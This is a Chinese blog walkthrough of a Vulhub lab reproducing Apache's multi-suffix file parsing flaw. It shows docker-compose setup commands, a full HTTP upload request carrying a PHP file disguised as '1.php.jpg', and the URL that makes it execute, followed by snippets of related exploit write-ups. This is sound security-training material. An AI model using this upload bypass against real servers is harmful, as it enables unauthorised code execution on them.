【Vulhub】Apache文件解析漏洞

最新推荐文章于 2025-08-13 20:25:32 发布
原创 最新推荐文章于 2025-08-13 20:25:32 发布 · 171 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #apache #开发语言

该文章描述了如何在Vulhub靶场环境中模拟Apache解析漏洞,通过执行docker-compose命令启动靶场,然后上传包含phpinfo函数的1.php.jpg文件,利用HTTPPOST请求进行文件上传。一旦上传成功,通过路径拼接访问服务器上的1.php.jpg来验证漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

步骤一:进入Vulhub靶场并执行以下命令启动靶场...

cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a

步骤二:访问靶机并上传1.php.jpg文件,文件内容为phpinfo函数...进行抓包..

POST / HTTP/1.1
Host: 101.42.118.221
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------13126981399916040642324260341
Content-Length: 260
Origin: http://101.42.118.221
Connection: close
Referer: http://101.42.118.221/
Upgrade-Insecure-Requests: 1

-----------------------------13126981399916040642324260341
Content-Disposition: form-data; name="file_upload"; filename="1.php.jpg"
Content-Type: application/octet-stream

<?php phpinfo();?>

-----------------------------13126981399916040642324260341--

步骤三:上传成功后与网站进行路径拼接...如下:

http://101.42.118.221/uploadfiles/1.php.jpg

上仙@
关注
vulhub Nginx文件解析漏洞
qq_51331767的博客
03-06 442
由于用户的配置问题,在php的配置文件中cgi.fix_pathinfo默认开启,当url中有不存在的文件php会向前递归,将../.jpg/.php解析为/.php文件。将php-fpm.conf中的 security.limit_extensions =.php,只支持php后缀解析。http://IP/uploadfiles/图片.jpg/.php。在文件路径后加上.php,在进行访问,发现php代码已经被执行。访问http://IP/,看到这个页面表示漏洞环境搭建成功。访问文件的路径,正常访问。
漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1465
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
06 - vulhub - Apache HTTPD 多后缀解析漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-15 2919
httpd是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。 Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析php文件
vulhub php文件包含漏洞复现
weixin_53730939的博客
03-04 433
vulhub php文件包含漏洞复现过程
vulhub中间件解析漏洞复现
m0_46684679的博客
12-07 1233
vulhub中间件解析漏洞复现
Vulhub靶场Apache解析漏洞
mirliasheong的博客
12-21 611
原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。创建一个名为1.php.jpg的文件,内容输入。
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1904
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3703
(1)第一种:未知扩展名解析漏洞 Apache文件解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
复现vulhub nginx解析漏洞
BBH_FCC的博客
03-05 830
(1)切换目录:cd vulhub-master/nginx/nginx_parsing_vulnerability。(2)docker-compose up -d 启动。(3)访问:http:// 192.168.68.152。(4) 上传一个图片,burpsuite抓包。(5)send to repeater,修改数据包,在末尾添加,点击go。
vulhub漏洞复现-Nginx
遇事不决冲冲冲
10-28 5037
Nginx nginx是一个高性能的HTTP和反向代理web服务器。 思路 在关闭了pathinfo的情况下,只有.php后缀的文件才会被发送给fastcgi解析。 而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi,而Fastcgi根据SCRIPT_FILENAM
关于 Apache 常见安全漏洞 --vulhub靶场练习
m0_60742333的博客
03-23 1939
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。以下实验环境皆来自于vulhub实验靶场,如下图示例,下载好vulhub环境进入要测试的漏洞文件夹,使用docker-compose up -d 命令开启实验。7. 将请求方式修改成POST,然后在请求体写入echo,并将数据包放行即可,使用bash进行反弹shell。后缀进行解析,导致绕过一些服务器的安全策略。
vulhub-Apache HTTPD 多后缀解析漏洞
m0_58265086的博客
09-09 230
放入1.php.jpg,并上传到服务器。exec 表示在容器中执行一个命令,该命令后加容器ID和要执行命令,上面执行的命令就是/bin/bash。这里代码增加了$,因此只会检查文件的最后一个后缀,因此我们可以通过多重后缀名添加的方式,绕过这个过滤机制。-t 表示分配一个tty终端设备,加上这个参数就具有按TAB自动补全命令等等功能。-i 表示即使没有连接,也要保持STDIN打开,也就是一直监听命令的状态。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
vulhub漏洞复现44_Nginx
weixin_44193247的博客
02-10 1549
vulhub漏洞复现练习篇
如何构建PHP表单页面及验证相关原理(PHP基础)
2301_81242582的博客
08-12 1090
思路为 通过if – else + empty()函数 语句实现是否为空的验证以及错误信息的设置,最终在HTML页面对错误信息进行输出。
iscc2025区域赛wp
最新发布
star3119391396的博客
08-13 662
2025ISCC区域赛web和misc方向的wp
在Linux中模拟配置高性能web服务器
qq_59278745的博客
08-11 505
Linux高性能Web服务器配置与IO模型解析 本文介绍了Linux环境下高性能Web服务器的配置原理和关键IO模型。主要内容包括: Web服务基础:详细解析Apache的三种工作模式(prefork/worker/event)和Nginx架构特点,比较不同模式的优缺点及适用场景。 性能影响因素:从客户端硬件、网络条件到服务端架构设计、并发处理等方面分析影响Web性能的关键因素。 IO模型详解:深入讲解磁盘IO和网络IO的工作原理,包括机械磁盘的寻道时间、旋转延迟等性能指标计算。 IO模型分类:系统阐述同步
攻防世界-ics-05(远程文件执行)
weixin_51334173的博客
08-11 277
大致浏览一下网页,发现就这边会有东西。看一下源码会不会有东西或者稍微点击一下这个页面的内容看会不会出现东西。点击了一下这个云平台设备维护中心发现url变了,是get的方法传page参数。
Apache 文件解析漏洞
03-22
好的,我现在需要处理用户关于Apache文件解析漏洞CVE-2017-15715的修复方案的询问。首先,我需要回顾用户提供的引用内容,确保准确理解漏洞的成因和现有信息。 根据引用[1]和[2],这个漏洞主要涉及Apache HTTPD ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值